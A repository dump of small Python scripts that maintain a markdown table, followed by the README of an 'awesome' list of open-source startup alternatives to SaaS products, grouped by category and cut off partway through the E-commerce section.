File: sort.py def sort_readme(): with open("README.md", "r", encoding="utf-8") as f: all = f.readlines() table_start = "|Category|Company|Description|GitHub Stars|Alternative to|\n" table_end = "<!-- END STARTUP LIST -->\n" idx = all.index(table_start) idx_end = all.index(table_end) find_name = lambda x: x[x.index("[") + 1 : x.index("]")].strip() find_cat = lambda x: x[: x.index("|")].strip() pairs = [(find_cat(x), find_name(x)) for x in all[idx + 2 : idx_end - 1]] sorted_pairs = sorted(pairs) right_elements = [all[idx + 2 : -1][pairs.index(i)] for i in sorted_pairs] all[idx + 2 : idx_end - 1] = right_elements with open("README.md", "w", encoding="utf-8") as f: f.writelines(all) if __name__ == "__main__": sort_readme() File: build_website.py import yaml import os def remove_github_com(s: str): return s.replace("https://github.com/", "") def remove_https(s: str): s = s.replace("https://", "") s = s.replace("http://", "") return s.strip("/") markdown_template = """ # {company_name} <a href="{link}"><img src="https://icons.duckduckgo.com/ip3/{clean_link}.ico" alt="Avatar" width="30" height="30" /></a> [![GitHub stars](https://img.shields.io/github/stars/{clean_gh_link}.svg?style=social&label=Star&maxAge=2592000)](https://GitHub.com/{clean_gh_link}/stargazers/) [![GitHub forks](https://img.shields.io/github/forks/{clean_gh_link}.svg?style=social&label=Fork&maxAge=2592000)](https://GitHub.com/{clean_gh_link}/network/) [![GitHub issues](https://img.shields.io/github/issues/{clean_gh_link}.svg)](https://GitHub.com/N{clean_gh_link}/issues/) [![GitHub license](https://img.shields.io/github/license/{clean_gh_link}.svg)](https://github.com/{clean_gh_link}/blob/master/LICENSE) [![GitHub contributors](https://img.shields.io/github/contributors/{clean_gh_link}.svg)](https://GitHub.com/{clean_gh_link}/graphs/contributors/) **Category**: {category} **Github**: [{clean_gh_link}]({gh_link}) **Website**: [{clean_link}]({link}) **Description**: {description} **Alternative to**: {alts} """ SPECIAL_MAPPING = { "ELT / ETL": "ETL", "Robotic Process Automation (RPA)": "Robotic Process Automation", "OPAL (Permit.io)": "OPAL", } appl = lambda x: SPECIAL_MAPPING[x] if x in SPECIAL_MAPPING else x def get_all_companies(): arr = [] for filename in os.listdir("submissions"): if filename.endswith(".yaml"): with open(f"submissions/{filename}", "r", encoding="utf-8") as file: obj = yaml.load(file, yaml.Loader) obj["category"] = appl(obj["category"]) obj["company_name"] = appl(obj["company_name"]) arr.append(obj) return arr def get_all_categories(arr): categories = set() for obj in arr: categories.add(obj["category"]) return categories def create_website_directories(categories): for category in categories: if not os.path.exists(f"website/docs/{category}"): os.mkdir(f"website/docs/{category}") def generate_alternative_md(alts_names, alts_links): alt_md = "" for alt_link, alt_name in zip(alts_links, alts_names): alt_md += f"[{alt_name}]({alt_link}), " return alt_md.strip(", ") def create_markdown_for_companies(companies): for company in companies: file_name = "-".join(company["company_name"].split(" ")) with open( f"website/docs/{company['category']}/{file_name}.md", "w", encoding="utf-8" ) as file: file.write( markdown_template.format( company_name=company["company_name"], category=company["category"], gh_link=company["gh_link"], clean_gh_link=remove_github_com(company["gh_link"]), link=company["link"], clean_link=remove_https(company["link"]), description=company["description"], alts=generate_alternative_md( company["alts_names"], company["alts_links"] ), ) ) if __name__ == "__main__": companies = get_all_companies() categories = get_all_categories(companies) # creating categories for the website in the docs folder create_website_directories(categories) # creating markdown files for the companies create_markdown_for_companies(companies) File: create_yamls.py """ This script create yamls from README """ import yaml def read_readme(): with open("README.md", "r", encoding="utf-8") as f: all = f.readlines() table_start = "|Category|Company|Description|GitHub Stars|Alternative to|\n" table_end = "<!-- END STARTUP LIST -->\n" idx = all.index(table_start) idx_end = all.index(table_end) return all[idx + 2 : idx_end - 1] def parse_line(line: str): arr = line.split("|") category = arr[0] name = arr[1].split("]")[0][1:] website = arr[1].split("]")[1][1:-1] description = arr[2] github = arr[3].split(">")[0].split("href=")[1] alts = list(map(lambda x: x.strip().split("]")[0][1:], arr[4].split(","))) alts_links = list(map(lambda x: x.strip().split("](")[1][:-1], arr[4].split(","))) return dict( category=category, company_name=name, link=website, description=description, gh_link=github, alts_names=alts, alts_links=alts_links, ) if __name__ == "__main__": arr = read_readme() for line in arr: obj = parse_line(line) file_name = "_".join(obj["company_name"].split(" ")) with open(f"submissions/{file_name}.yaml", "w") as file: yaml.dump(obj, file, default_flow_style=False) File: build_readme.py """ This file builds README from YAML """ import yaml import os from add_company import add_new_company def parse_all_yamls(): arr = [] for filename in os.listdir("submissions"): if filename.endswith(".yaml"): with open(f"submissions/{filename}", "r") as file: obj = yaml.load(file, yaml.Loader) arr.append(obj) return arr def build_list(): arr = parse_all_yamls() for obj in arr: add_new_company(**obj) if __name__ == "__main__": build_list() File: add_company.py """ This script adds company directly to the list """ # import yaml def get_repo_from_url(url): """ Given a url, return the repository name. :param url: the url of the repo :return: The repo name. """ idx = url.find(".com/") return url[idx + len(".com/") :].strip("/") def create_alternatives_md(names, links): """ Create a markdown string of the form: [name1](link1), [name2](link2), ... :param names: A list of alternative names for the image :param links: A list of links to the alternative versions of the file :return: A string of the form: """ return ", ".join( (f"""[{name.strip()}]({link.strip()})""" for name, link in zip(names, links)) ) def create_shield_link(gh_link): return "https://img.shields.io/github/stars/{repo}?style=social".format( repo=get_repo_from_url(gh_link) ).strip() def create_new_line( category, company_name, description, link, gh_link, alts_names, alts_links ): return "{}|{}|{}|{}|{}|\n".format( category.strip(), f"[{company_name.strip()}]({link.strip()})", description.strip(), f'<a href={gh_link.strip()}><img src="{create_shield_link(gh_link)}" width=150/></a>', create_alternatives_md(alts_names, alts_links), ) def add_new_company( category, company_name, description, link, gh_link, alts_names, alts_links ): with open("README.md", "r", encoding="utf-8") as f: all = f.readlines() table_start = "|Category|Company|Description|GitHub Stars|Alternative to|\n" table_end = "<!-- END STARTUP LIST -->\n" idx = all.index(table_start) idx_end = all.index(table_end) find_name = lambda x: x[x.index("[") + 1 : x.index("]")].strip() find_cat = lambda x: x[: x.index("|")].strip() categories = [(find_cat(x), find_name(x)) for x in all[idx + 2 : idx_end - 1]] search_tup = (category.strip(), company_name.strip()) insert_idx = -1 for i, tup in enumerate(reversed(categories)): if search_tup == tup: return "This entry already exists" elif search_tup > tup: print(search_tup, tup) insert_idx = len(categories) - i break all.insert( insert_idx + idx + 2, create_new_line( category, company_name, description, link, gh_link, alts_names, alts_links ), ) # file_name = "_".join(company_name.split(" ")) # with open(f"submissions/{file_name}.yaml", "w") as file: # yaml.dump( # dict( # category=category, # company_name=company_name, # description=description, # link=link, # gh_link=gh_link, # alts_names=alts_names, # alts_links=alts_links, # ), # file, # default_flow_style=False, # ) with open("README.md", "w", encoding="utf-8") as f: f.writelines(all) return "ok, added!" def add_company_from_command_line(): count = 0 args = dict() while True: if count == 0: args["company_name"] = input("Enter the company name.\n(e.g Metabase)\n: ") print("-" * 100) count += 1 elif count == 1: args["category"] = input( "Enter category of the company. May be an existing or a new one.\n(e.g Business Intelligence)\n: " ) print("-" * 100) count += 1 elif count == 2: args["description"] = input( "Description of the company.\nKeep it short and simple (use one line)\n: " ) print("-" * 100) count += 1 elif count == 3: args["link"] = input( """Url to the company's website.\n(e.g https://www.metabase.com/)\n: """ ) print("-" * 100) count += 1 elif count == 4: args["gh_link"] = input( """"Url of the product's github repo.\n(e.g https://github.com/metabase/metabase)\n: """ ) print("-" * 100) count += 1 elif count == 5: args["alts_names"] = input( """Names of the company's well-known SaaS competitors.\n(e.g for Metabase: PowerBI, DataStudio, Tableau)\n: """ ).split(",") print("-" * 100) count += 1 elif count == 6: args["alts_links"] = input( "Links to the corresponding SaaS competitors.\n(e.g for Metabase: https://powerbi.microsoft.com/, https://datastudio.google.com/, https://www.tableau.com/)\n: " ).split(",") print("-" * 100) count += 1 else: result = add_new_company(**args) print(result) break if __name__ == "__main__": add_company_from_command_line() File: count.py def count_companies_in_readme(): with open('README.md', 'r', encoding='utf-8') as f: all = f.readlines() table_start = '|Category|Company|Description|GitHub Stars|Alternative to|\n' idx = all.index(table_start) return len(all[idx + 2: -1]) if __name__ == "__main__": print( f"Found companies in README: {count_companies_in_readme()}" )
# Awesome open-source alternatives to SaaS [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) Awesome list of open-source startup alternatives to established SaaS products. Maintained by folks at [![Runa Capital](https://img.shields.io/static/v1?label=&message=%20&style=social&logoWidth=50&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAD8AAAAUCAYAAAA6NOUqAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAUpSURBVHgBtVhNUuNGFH7d/gkzmSrEKjGzGPkEmKpAUtkgdkBSBTkB4gSYE9icAHMCzAniqWI8kxXKJsXAVGFOgLLBZDWeRSapBNTpT/2EZCEbmcl8VV2S+v97f/1agnLi0qlZU1PldZLCIaUcIZSlSFhoU4p6+rsX3MrO81/evqTHY0kXVxebvwe6dHQ5pM8A8VCH/krNJllq6I4bEdmxUOTr0qy8OZ10w+tkiPq67JAhvklGGI4uv9L/jLHkr9cWtvWjmYt0Gkp5Sty4s93z3ycYda5LT5etRN2lLh7XRfsY8BPf07ok15jTpcZ9eok2i9usqL6YsYHQxJ88LR5o0hv3GoXwVAAzDy7CT0nTKpB6MeWm+jlClTw913zV6w0oH9L9bN7sgAlBOG2KhQPluLpU+b3JfT0y1kLcZvPYCJiznkn+iyflY2UWYx5qoJRoUVkeVjonftaY/sp3u0IGe3pcLDBB9tSzYo03kxfY2Hq0QSbTIqPB3phxdR4zw9+RG70g40pVioX7sy6OTM9wvbqwJ0RMXCnV+uvPL6uV7unuKOJA5c2Jf0Nq91790TuPJgPWdsloGGQcik13nAWl187qC+to8LzWEPn+ymJDCQEJhtomKZdnX5/tVD0vl9kWSTWGa0SbJoeny09ktI1NfqBPB6zgPRnzhyDBJyZvonroM4AfqFKtcnTi5ZkZMQIWo0gOxQhFhSY9Hvv8TAo0KybkARQKF8Ap0ibjBlbs86J8zG++oqIz2/0tNDUT/EqbOMsrr8+Gjpurte9fiOAfV0hRT58IilQ9muOR8HnTsACQhln3uA5tNYqj+kPwyLhSg8c4GBceddrcN7XW23iXkmpfHZ1emHptDRCKSEhYhQtTMslJAu4S6HN+tnu2T5MDSY6g4QBpUxy8IMxNroMiYMoz3N9mUm0eh71t8LgoZ0DdRTTOkF9dvDQEg2al+253JPGHgGNQFdykxjGPEuU9Ev/WJzzzPztkqHVD0I+Im5ZSIzdxTRrBsfLq7XLa1GWxPC2lToep5IdrjQc0A9M80GWPzDGVF0hglnL2hSWdS71xN/wUd8EuhJSiFUb8bOi+aqtAav7vj09nQHpUcIQLqVtzgiipWoghNBogjHYEpknTY4fiAIjn+pi+UJAlrn9YeK8TmIE+x6vpHn/8uDinkKaqlG+Hfq/cdAAch/7qt9qFlJN0rRSwBlLZmVQ9NOpyO/wXFydoeIPrPDKCsslYCnwa2ZxPJuPDHhvcjoC5z+/HOOraARnNpAGtCZ2m8kQx4A7a1PtrCwdXa/O5TFNnfyY7M/NlYY6yM7gPTA6lxXUd7gshYu+I4NElKEpv0Q5BREFun9vvXEN+/eps53l39DU0jPyBXBaZGxMu8vf+yjeNcUIIg16QcU+4T3KUS4AYzNjm7yjy+2T2BcF5if6oH1B8DGJv2zx/NAdl5vZpIHXVj/n+2mJDx4H6kBuEViCbgmTzanWxIxR1pM4JbgvFQeH2xgpEsGHyAEMMl6IRy/gUm24yaCIP32KSbsY4K9U/jW1+Yo6DZEMu8hGQ3+sLzCFJpLGpWxzBorUf6hLgnW4oKKBW6hBxB59EqTViemipSUaDbYp9fMAE0sEX1gATrvGYZKSPkiGPxzkUJzidaD1Bj4QWgk2FYAmmjz87Dw7IyAFGwOJN+hTHGpvfo+stNHjI7z4N3++jd4eMEAY8PqqPnvajySdx6ThW+dlHRwba94SweTEd3JHtCV8UxMu894SciMh79An4D/op5DM7HoOhAAAAAElFTkSuQmCC)](https://runacap.com) Also checkout our [ROSS index](https://runacap.com/ross-index/): fastest-growing open-source startups, every quarter. ## Criteria Open-source company is added to the list if: 1. Its product is strongly based on an open-source repo 2. It has a well-known closed-source competitor, solving a similar business problem 3. It is a private for-profit company, founded in the last 10 years 4. Its repo has 100+ stars on GitHub Things change really fast in the startup world, so this list can neither be fully complete, nor 100% up to date. Don't hesitate to [contribute](.github/CONTRIBUTING.md) and add new startups. Let's build the most comprehensive list together. Any questions or suggestions? Feel free to DM project maintainer [@garrrikkotua](https://twitter.com/garrrikkotua) -------------------- ## Startup List All startups in the list are sorted by categories and sorted in alphabetical order. If you click on the stars badge you will get to the product's repo. **Have a good search!** <!-- BEGIN STARTUP LIST --> |Category|Company|Description|GitHub Stars|Alternative to| |:-------|:------|:----------|:----------:|:------------:| API Gateway|[Apache APISIX](https://github.com/apache/apisix)|Cloud Native API Gateway under the Apache Software Foundation|<a href=https://github.com/apache/apisix><img src="https://img.shields.io/github/stars/apache/apisix?style=social" width=150/></a>|[apigee](https://cloud.google.com/apigee) API Platform|[Firecamp](https://firecamp.dev/)|DX first open-source API devtool|<a href=https://github.com/firecamp-dev/firecamp><img src="https://img.shields.io/github/stars/firecamp-dev/firecamp?style=social" width=150/></a>|[Postman](https://www.postman.com/) API Platform|[Fusio](https://github.com/apioo/fusio)|API management platform|<a href=https://github.com/apioo/fusio><img src="https://img.shields.io/github/stars/apioo/fusio?style=social" width=150/></a>|[Postman](https://www.postman.com/) API Platform|[Hoppscotch](https://hoppscotch.io/)|API development ecosystem|<a href=https://github.com/hoppscotch/hoppscotch><img src="https://img.shields.io/github/stars/hoppscotch/hoppscotch?style=social" width=150/></a>|[Postman](https://www.postman.com/) API Platform|[Keploy](https://keploy.io/)|e2e Testing and Data Mocking|<a href=https://github.com/keploy/keploy><img src="https://img.shields.io/github/stars/keploy/keploy?style=social" width=150/></a>|[Smartbear](https://smartbear.com/), [Newman](https://learning.postman.com/docs/running-collections/using-newman-cli/command-line-integration-with-newman/) API Platform|[Step CI](https://stepci.com/)|API Testing and Monitoring|<a href=https://github.com/stepci/stepci><img src="https://img.shields.io/github/stars/stepci/stepci?style=social" width=150/></a>|[Checkly](https://www.checklyhq.com), [Postman](https://www.postman.com/) Auth & SSO|[BoxyHQ](https://boxyhq.com)|Enterprise Readiness made simple|<a href=https://github.com/boxyhq/jackson><img src="https://img.shields.io/github/stars/boxyhq/jackson?style=social" width=150/></a>|[Auth0](https://auth0.com/)| Auth & SSO|[Cerbos](https://cerbos.dev/)|Granular access control|<a href=https://github.com/cerbos/cerbos><img src="https://img.shields.io/github/stars/cerbos/cerbos?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[FusionAuth](https://fusionauth.io/)|User authentication and session management framework|<a href=https://github.com/FusionAuth/fusionauth-containers><img src="https://img.shields.io/github/stars/FusionAuth/fusionauth-containers?style=social" width=150/></a>|[Okta](https://www.okta.com/), [Auth0](https://auth0.com/)| Auth & SSO|[Hanko](https://www.hanko.io)|Passkey-first authentication framework|<a href=https://github.com/teamhanko/hanko><img src="https://img.shields.io/github/stars/teamhanko/hanko?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[Keycloak](https://www.cloud-iam.com/)|User authentication and session management framework|<a href=https://github.com/keycloak/keycloak><img src="https://img.shields.io/github/stars/keycloak/keycloak?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[OPAL (Permit.io)](https://www.opal.ac/)|Authorization administration framework (Open Policy)|<a href=https://github.com/permitio/opal><img src="https://img.shields.io/github/stars/permitio/opal?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[Ory](https://www.ory.sh/)|Identity platform|<a href=https://github.com/ory/kratos><img src="https://img.shields.io/github/stars/ory/kratos?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[Oso](https://www.osohq.com/)|Authorization building framework|<a href=https://github.com/osohq/oso><img src="https://img.shields.io/github/stars/osohq/oso?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[Supertokens](https://supertokens.io/)|User authentication and session management framework|<a href=https://github.com/supertokens/supertokens-core><img src="https://img.shields.io/github/stars/supertokens/supertokens-core?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[Warrant](https://warrant.dev/)|Authorization and access control as a service|<a href=https://github.com/warrant-dev/warrant><img src="https://img.shields.io/github/stars/warrant-dev/warrant?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[Zitadel](https://zitadel.com/)|User authentication and session management framework|<a href=https://github.com/zitadel/zitadel><img src="https://img.shields.io/github/stars/zitadel/zitadel?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/)| Backend as a service|[AceBase](https://acebase.io/)|Backend server with REST APIs to manage core backend needs|<a href=https://github.com/appy-one/acebase><img src="https://img.shields.io/github/stars/appy-one/acebase?style=social" width=150/></a>|[Firebase](https://firebase.google.com/) Backend as a service|[Amplication](https://amplication.com/)|Backend server with REST and GraphQL APIs to manage core backend needs|<a href=https://github.com/amplication/amplication><img src="https://img.shields.io/github/stars/amplication/amplication?style=social" width=150/></a>|[Firebase](https://firebase.google.com/) Backend as a service|[Appwrite](https://appwrite.io/)|Backend server with REST APIs to manage core backend needs|<a href=https://github.com/appwrite/appwrite><img src="https://img.shields.io/github/stars/appwrite/appwrite?style=social" width=150/></a>|[Firebase](https://firebase.google.com/) Backend as a service|[CASE](https://case.app)|Lightweight Backend-as-a-Service with essential features|<a href=https://github.com/casejs/case><img src="https://img.shields.io/github/stars/casejs/case?style=social" width=150/></a>|[Firebase](https://firebase.google.com/)| Backend as a service|[Encore](https://encore.dev/)|Backend Development Engine for cloud-based apps, APIs, and distributed systems|<a href=https://github.com/encoredev/encore><img src="https://img.shields.io/github/stars/encoredev/encore?style=social" width=150/></a>|[Firebase](https://firebase.google.com/)| Backend as a service|[Kuzzle](https://kuzzle.io/kuzzle-backend/)|Backend server with REST APIs to manage core backend needs|<a href=https://github.com/kuzzleio/kuzzle><img src="https://img.shields.io/github/stars/kuzzleio/kuzzle?style=social" width=150/></a>|[Firebase](https://firebase.google.com/) Backend as a service|[Nhost](https://nhost.io/)|Backend server with GraphQL|<a href=https://github.com/nhost/nhost><img src="https://img.shields.io/github/stars/nhost/nhost?style=social" width=150/></a>|[Firebase](https://firebase.google.com/) Backend as a service|[PocketBase](https://pocketbase.io/)|Backend server with REST APIs to manage core backend needs|<a href=https://github.com/pocketbase/pocketbase><img src="https://img.shields.io/github/stars/pocketbase/pocketbase?style=social" width=150/></a>|[Firebase](https://firebase.google.com/)| Backend as a service|[Supabase](https://supabase.io/)|Backend server with REST APIs to manage core backend needs|<a href=https://github.com/supabase/supabase><img src="https://img.shields.io/github/stars/supabase/supabase?style=social" width=150/></a>|[Firebase](https://firebase.google.com/) Business Intelligence|[Metabase](https://www.metabase.com/)|Business intelligence software|<a href=https://github.com/metabase/metabase><img src="https://img.shields.io/github/stars/metabase/metabase?style=social" width=150/></a>|[Tableau](https://www.tableau.com/), [Power BI](https://powerbi.microsoft.com/), [DataStudio](https://datastudio.google.com/) Business Intelligence|[Preset](https://www.preset.io)|Modern BI platform powered by Apache Superset|<a href=https://github.com/apache/superset><img src="https://img.shields.io/github/stars/apache/superset?style=social" width=150/></a>|[PowerBI](https://powerbi.microsoft.com/), [Tableau](https://www.tableau.com/), [Mode Analytics](https://mode.com/)| CMS|[Builder](https://builder.io/)|Drag and drop page builder and CMS|<a href=https://github.com/builderio/builder><img src="https://img.shields.io/github/stars/builderio/builder?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) CMS|[Concrete](https://www.concretecms.com/)|CMS for teams|<a href=https://github.com/concrete5/concrete5><img src="https://img.shields.io/github/stars/concrete5/concrete5?style=social" width=150/></a>|[Contentful](https://www.contentful.com/)| CMS|[Directus](https://directus.io/)|Data platform which wraps any database with an intuitive app|<a href=https://github.com/directus/directus><img src="https://img.shields.io/github/stars/directus/directus?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) CMS|[Ghost](https://ghost.org/)|Headless Node.js publishing platform|<a href=https://github.com/tryghost/ghost><img src="https://img.shields.io/github/stars/tryghost/ghost?style=social" width=150/></a>|[Medium](https://www.medium.com/), [Substack](https://substack.com/) CMS|[Netlify CMS](https://www.netlifycms.org/)|Git-based CMS for static site generators|<a href=https://github.com/netlify/netlify-cms><img src="https://img.shields.io/github/stars/netlify/netlify-cms?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) CMS|[Plasmic](https://plasmic.app/)|The headless page builder for singe-page frameworks|<a href=https://github.com/plasmicapp/plasmic><img src="https://img.shields.io/github/stars/plasmicapp/plasmic?style=social" width=150/></a>|[Contentful](https://www.contentful.com/)| CMS|[Strapi](https://strapi.io/)|Node.js Headless CMS to build customisable APIs|<a href=https://github.com/strapi/strapi><img src="https://img.shields.io/github/stars/strapi/strapi?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) CMS|[Sulu](https://sulu.io/)|Modern Symfony based CMS|<a href=https://github.com/sulu/sulu><img src="https://img.shields.io/github/stars/sulu/sulu?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) CMS|[Tina](https://tina.io/)|Visual editor for React websites|<a href=https://github.com/tinacms/tinacms><img src="https://img.shields.io/github/stars/tinacms/tinacms?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) CMS|[Webiny](https://www.webiny.com/)|Enterprise serverless CMS|<a href=https://github.com/webiny/webiny-js><img src="https://img.shields.io/github/stars/webiny/webiny-js?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) Cloud Data Warehouse|[Databend](https://databend.rs)|Elastic and Workload-Aware Modern Cloud Data Warehouse|<a href=https://github.com/datafuselabs/databend><img src="https://img.shields.io/github/stars/datafuselabs/databend?style=social" width=150/></a>|[Snowflake](https://www.snowflake.com)| Cloud Development Environment|[Gitpod](https://gitpod.io)|Automated provisioning of cloud development environments with multiple git providers & IDEs|<a href=https://github.com/gitpod-io/gitpod><img src="https://img.shields.io/github/stars/gitpod-io/gitpod?style=social" width=150/></a>|[Codespaces](https://github.com/features/codespaces)| Cloud Storage|[Minio](https://min.io/)|S3 compatible object storage|<a href=https://github.com/minio/minio><img src="https://img.shields.io/github/stars/minio/minio?style=social" width=150/></a>|[Amazon S3](https://aws.amazon.com/s3/)| Cloud Storage|[Storj](https://www.storj.io/)|Decentralized cloud storage|<a href=https://github.com/storj/storj><img src="https://img.shields.io/github/stars/storj/storj?style=social" width=150/></a>|[Amazon S3](https://aws.amazon.com/s3/)| Cloud-Native Application Protection Platform|[Deepfence ThreatMapper](https://github.com/deepfence/ThreatMapper)|Apache v2, powerful runtime vulnerability and compliance scanner for kubernetes, virtual machines, cloud and serverless.|<a href=https://github.com/deepfence/ThreatMapper><img src="https://img.shields.io/github/stars/deepfence/ThreatMapper?style=social" width=150/></a>|[Palo Alto Prisma](https://www.paloaltonetworks.com/prisma/cloud)| Communication|[Fonoster](https://fonoster.com/)|APIs for SMS, voice and video|<a href=https://github.com/fonoster/fonoster><img src="https://img.shields.io/github/stars/fonoster/fonoster?style=social" width=150/></a>|[Twilio](https://www.twilio.com/)| Communication|[Novu](https://novu.co/)|Components and APIs for email, sms, direct and push|<a href=https://github.com/novuhq/novu><img src="https://img.shields.io/github/stars/novuhq/novu?style=social" width=150/></a>|[Courier](https://www.courier.com/), [MagicBell](https://www.magicbell.com/), [Knock](https://knock.app/)| Community Platform|[crowd.dev](https://crowd.dev/)|Suite of community and data tools built to unlock community-led growth for your organization|<a href=https://github.com/CrowdDotDev/crowd.dev><img src="https://img.shields.io/github/stars/CrowdDotDev/crowd.dev?style=social" width=150/></a>|[Orbit](https://orbit.love/), [Common Room](https://www.commonroom.io/), [Commsor](https://www.commsor.com/)| Customer Data Platform|[Jitsu](https://jitsu.com/)|Fully-scriptable data ingestion engine for modern data teams|<a href=https://github.com/jitsucom/jitsu><img src="https://img.shields.io/github/stars/jitsucom/jitsu?style=social" width=150/></a>|[Segment](https://segment.com/) Customer Data Platform|[Rudderstack](https://rudderstack.com/)|Customer data platform for developers|<a href=https://github.com/rudderlabs/rudder-server><img src="https://img.shields.io/github/stars/rudderlabs/rudder-server?style=social" width=150/></a>|[Segment](https://segment.com/) Customer Data Platform|[Tracardi](http://www.tracardi.com/)|Customer Data Platform with Consumer Journey automation engine|<a href=https://github.com/tracardi/tracardi><img src="https://img.shields.io/github/stars/tracardi/tracardi?style=social" width=150/></a>|[Segment](https://segment.com/), [Zapier](https://zapier.com/) Customer Engagement|[Chaskiq](https://chaskiq.io/)|Live chat widget|<a href=https://github.com/chaskiq/chaskiq><img src="https://img.shields.io/github/stars/chaskiq/chaskiq?style=social" width=150/></a>|[Intercom](https://www.intercom.com/), [Zendesk](https://www.zendesk.com/) Customer Engagement|[Chatwoot](https://www.chatwoot.com/)|Live chat widget|<a href=https://github.com/chatwoot/chatwoot><img src="https://img.shields.io/github/stars/chatwoot/chatwoot?style=social" width=150/></a>|[Intercom](https://www.intercom.com/), [Zendesk](https://www.zendesk.com/) Customer Engagement|[Papercups](https://papercups.io/)|Live chat widget|<a href=https://github.com/papercups-io/papercups><img src="https://img.shields.io/github/stars/papercups-io/papercups?style=social" width=150/></a>|[Intercom](https://www.intercom.com/), [Zendesk](https://www.zendesk.com/) Cybersecurity|[CloudQuery](https://cloudquery.io/)|Assess, audit, and evaluate the configurations of your cloud assets.|<a href=https://github.com/cloudquery/cloudquery><img src="https://img.shields.io/github/stars/cloudquery/cloudquery?style=social" width=150/></a>|[AWS Config](https://aws.amazon.com/config/), [GCP Cloud Asset Inventory](https://cloud.google.com/asset-inventory), [AWS GuardDuty](https://aws.amazon.com/guardduty/)| Cybersecurity|[CrowdSec](http://crowdsec.net/)|Collaborative IPS able to analyze visitor behavior and to provide an adapted response to all kinds of attacks.|<a href=https://github.com/crowdsecurity/crowdsec><img src="https://img.shields.io/github/stars/crowdsecurity/crowdsec?style=social" width=150/></a>|[GreyNoise](https://www.greynoise.io/)| Cybersecurity|[Faraday](https://faradaysec.com)|Open Source Vulnerability Management and Orchestration Platform|<a href=https://github.com/infobyte/faraday><img src="https://img.shields.io/github/stars/infobyte/faraday?style=social" width=150/></a>|[Plextrac](https://plextrac.com//), [Vulcan](https://vulcan.io/)| Cybersecurity|[Firezone](https://www.firez.one/)|VPN Server & Firewall for teams|<a href=https://github.com/firezone/firezone><img src="https://img.shields.io/github/stars/firezone/firezone?style=social" width=150/></a>|[OpenVPN Access Server](https://openvpn.net/access-server/) Cybersecurity|[Gravitl](https://gravitl.com)|WireGuard virtual networking platform (VPN)|<a href=https://github.com/gravitl/netmaker><img src="https://img.shields.io/github/stars/gravitl/netmaker?style=social" width=150/></a>|[Tailscale](https://tailscale.com/), [OpenVPN](https://openvpn.net/)| Cybersecurity|[LunaTrace](https://www.lunasec.io/)|Dependency Vulnerability Scanner and SBOM Inventory|<a href=https://github.com/lunasec-io/lunasec><img src="https://img.shields.io/github/stars/lunasec-io/lunasec?style=social" width=150/></a>|[GitHub Dependabot](https://github.blog/2020-06-01-keep-all-your-packages-up-to-date-with-dependabot/), [Snyk.io](https://snyk.io/), [SonaType Nexus](https://www.sonatype.com/products/vulnerability-scanner)| Cybersecurity|[Matano](https://www.matano.dev)|Open source cloud-native security lake platform (SIEM alternative) for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS|<a href=https://github.com/matanolabs/matano><img src="https://img.shields.io/github/stars/matanolabs/matano?style=social" width=150/></a>|[Splunk](https://www.splunk.com/), [Elastic Cloud](https://www.elastic.co/elastic-stack/)| Cybersecurity|[NetBird](https://netbird.io)|Zero Configuration Mesh VPN for Business|<a href=https://github.com/netbirdio/netbird><img src="https://img.shields.io/github/stars/netbirdio/netbird?style=social" width=150/></a>|[Tailscale](https://tailscale.com/), [OpenVPN](https://openvpn.net/)| Cybersecurity|[Nuclei](https://nuclei.projectdiscovery.io/)|Vulnerability scanner based on simple YAML based DSL|<a href=https://github.com/projectdiscovery/nuclei><img src="https://img.shields.io/github/stars/projectdiscovery/nuclei?style=social" width=150/></a>|[Tenable Nessus](https://www.tenable.com/products/nessus)| Design|[Modulz](https://www.modulz.app/)|Code-based tool for designing and prototyping|<a href=https://github.com/radix-ui/primitives><img src="https://img.shields.io/github/stars/radix-ui/primitives?style=social" width=150/></a>|[Figma](https://www.figma.com/)| Design|[Penpot](https://penpot.app/)|Design & prototyping platform|<a href=https://github.com/penpot/penpot><img src="https://img.shields.io/github/stars/penpot/penpot?style=social" width=150/></a>|[Figma](https://www.figma.com/)| Digital Signature|[DocuSeal](https://docuseal.co)|Digital Signing Infrastructure|<a href=https://github.com/docusealco/docuseal><img src="https://img.shields.io/github/stars/docusealco/docuseal?style=social" width=150/></a>|[DocuSign](https://www.docusign.com/)| Digital Signature|[Documenso](https://documenso.com)|Digital Signing Infrastructure|<a href=https://github.com/documenso/documenso><img src="https://img.shields.io/github/stars/documenso/documenso?style=social" width=150/></a>|[DocuSign](https://www.docusign.com/)| Digital Signature|[LibreSign](https://libresign.coop/)|Digital document signer|<a href=https://github.com/LibreSign/libresign><img src="https://img.shields.io/github/stars/libresign/libresign?style=social" width=150/></a>|[DocuSign](https://www.docusign.com/) E-commerce|[Bagisto](https://bagisto.com/en/)|Headless e-commerce platform|<a href=https://github.com/bagisto/bagisto><img src="https://img.shields.io/github/stars/bagisto/bagisto?style=social" width=150/></a>|[Shopify](https://www.shopify.com/), [Ecwid](https://www.ecwid.com/) E-commerce|[Medusa](https://www.medusajs.com/)|Headless e-commerce platform|<a 